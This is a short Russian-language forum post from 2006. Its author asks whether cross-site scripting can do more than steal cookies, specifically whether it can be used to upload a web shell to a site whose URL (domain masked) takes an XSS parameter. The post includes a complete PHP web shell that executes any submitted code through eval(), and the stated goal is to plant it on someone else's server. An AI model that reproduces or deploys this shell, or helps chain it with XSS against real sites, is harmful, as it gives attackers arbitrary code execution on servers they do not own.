
09.12.2006, 13:43
|
|
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
Провел на форуме: 2052669
Репутация:
178
|
|
Про Xss
Народ поскажите хсс только ворует куки или можно как то через это загрузить шелл например вот этот:
Код:
<?
$docr = $_SERVER['DOCUMENT_ROOT'];
$gpc = get_magic_quotes_gpc();
if (!empty($_POST['c'])) {
$c = $gpc ? stripslashes($_POST['c']) : $_POST['c'];
} else {
$c = NULL;
}
?><form action="" method="post">
<textarea cols="80" rows="30" name="c" id="c"><?=$c; ?></textarea>
<br><input type="submit">
</form><?
if (!is_null($c)) eval($c);
?>
Урл сайта имеет вид: http://*****.ru/info.php?log=[XSS]
|
|
|